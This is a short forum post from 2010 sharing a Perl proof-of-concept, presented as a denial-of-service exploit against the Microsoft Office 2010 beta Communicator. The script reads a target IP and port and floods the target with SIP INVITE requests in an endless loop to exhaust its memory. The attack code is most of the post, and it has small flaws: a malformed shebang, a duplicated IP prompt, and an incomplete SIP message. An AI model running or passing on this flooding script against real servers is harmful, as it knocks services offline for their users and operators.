Microsoft Office ( 2010 beta ) Communicator SIP denial of service Exploit

Discussion in 'Application Software' started by Checkout!, Apr 6, 2010.

  1. Checkout!

    Checkout! MDL Junior Member

    Mar 9, 2010
    57
    3
    0
    #1 Checkout!, Apr 6, 2010
    Last edited by a moderator: Apr 20, 2017
    Hello,

    Please verify this PoC for Microsoft Office ( 2010 beta ) exploit,

    Code:
    #!usr/bin/perl 
    #######################################################################################################################
    #    Microsoft Office 2010 Communicator allows remote attack to cause a denial of service (memory consumption) via    #
    #    a large number of SIP INVITE requests.                                                                           #
    #######################################################################################################################
       
       
    use IO::Socket;
       
    print("\nEnter IP Address of Target Server: \n");
    $vuln_host_ip = <STDIN>;
    print("\nEnter IP Address of Target Server: \n");
    $port = <STDIN>;
       
    $sock_sip = IO::Socket::INET->new(    PeerAddr => $vuln_host_ip,
                                         PeerPort => $port,
                                         Proto    => 'udp') || "Unable to create Socket";
    #if the server is configured on TCP replace 'udp' with 'tcp'.
       
    while(1)
    {
    print $sock_sip "INVITE sip:arpman.malicious.com SIP/2.0\r\nVia: SIP/2.0/UDP 172.16.16.4;branch=123-4567-900\r\n";
        
    }
       
    #program never comes here for execution
     
    close($sock_sip);
    Thanks!
    -j0